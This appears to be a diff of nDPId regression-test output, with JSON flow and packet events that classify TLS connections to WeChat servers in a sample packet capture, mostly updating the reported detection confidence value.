-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1492167697384,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167697384,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} -00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1113,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 